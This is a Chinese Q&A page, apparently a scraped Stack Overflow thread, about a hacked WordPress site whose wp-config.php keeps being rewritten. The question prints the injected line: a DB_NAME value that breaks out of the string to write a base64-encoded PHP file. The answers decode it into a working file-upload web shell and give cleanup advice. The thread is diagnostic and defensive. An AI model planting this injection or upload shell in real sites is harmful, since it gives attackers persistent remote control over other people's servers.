Fatal编程技术网
  • php/
  • wp-config.php不断更改数据库名称、用户名和密码

wp-config.php不断更改数据库名称、用户名和密码

php wordpress

wp-config.php不断更改数据库名称、用户名和密码,php,wordpress,Php,Wordpress,我正在使用WordPress和一个名为WP Rocket的插件来优化我的网站。从两天前开始,wp-config.php文件不断地将数据库名称更改为下面的代码 **Original DB name was define('DB_NAME', 'db1');** 但是改成 **define('DB_NAME', 'wordpress\'); file_put_contents(\"wp-upload-class.php\", base64_decode(**\'PD9waHANCmVjaG8gIl

我正在使用WordPress和一个名为WP Rocket的插件来优化我的网站。从两天前开始,wp-config.php文件不断地将数据库名称更改为下面的代码

**Original DB name was define('DB_NAME', 'db1');**
但是改成

**define('DB_NAME', 'wordpress\'); file_put_contents(\"wp-upload-class.php\", base64_decode(**\'PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRk
lMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYi
kiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW
5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWy
JmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2
hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi
4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==\')); /*');</i>
用户名和密码也更改为“用户”和“密码”,如下所示

/** MySQL database username */

define('DB_USER', 'user');

/** MySQL database password */

define('DB_PASSWORD', 'password');</i>
这是一个安全问题。插件正在更改您的配置以打开后门

我发现这篇文章可以帮助您:

这是一个安全问题。插件正在更改您的配置以打开后门

我发现那篇文章可以帮助你:

我想你的网站被黑了。如果您解码代码,您将得到:

  <?php
  echo "This shit works!";
  if (isset($_FILES["filename"]))
  {
     if($_FILES["filename"]["size"] > 1024*3*1024)
   {
     echo ("File too large (more than 3Mb)");
     exit;
   }
   if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
   {
     move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
     echo ("<br>Done!<br>");
   } else {
      echo("<br>Error! ".$php_errormsg."<br>");
   }
}
?>
代码只是一条关于上传文件大小的消息,但我认为这是更多被黑客攻击的base64文件部分的一部分

因此,现在您有两种选择: 我要雇人

2或者您可以逐步浏览互联网上的指南: 这是您第一次可以在wp.org上查看

提示:如果一个网站被黑客攻击,你应该首先让它不被访问者访问,这样没有人会被感染。

我想你的网站被黑客攻击了。如果您解码代码,您将得到:

  <?php
  echo "This shit works!";
  if (isset($_FILES["filename"]))
  {
     if($_FILES["filename"]["size"] > 1024*3*1024)
   {
     echo ("File too large (more than 3Mb)");
     exit;
   }
   if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
   {
     move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
     echo ("<br>Done!<br>");
   } else {
      echo("<br>Error! ".$php_errormsg."<br>");
   }
}
?>
代码只是一条关于上传文件大小的消息,但我认为这是更多被黑客攻击的base64文件部分的一部分

因此,现在您有两种选择: 我要雇人

2或者您可以逐步浏览互联网上的指南: 这是您第一次可以在wp.org上查看

提示:如果一个网站被黑客攻击,你应该首先让它不被访问者访问,这样就不会有人被感染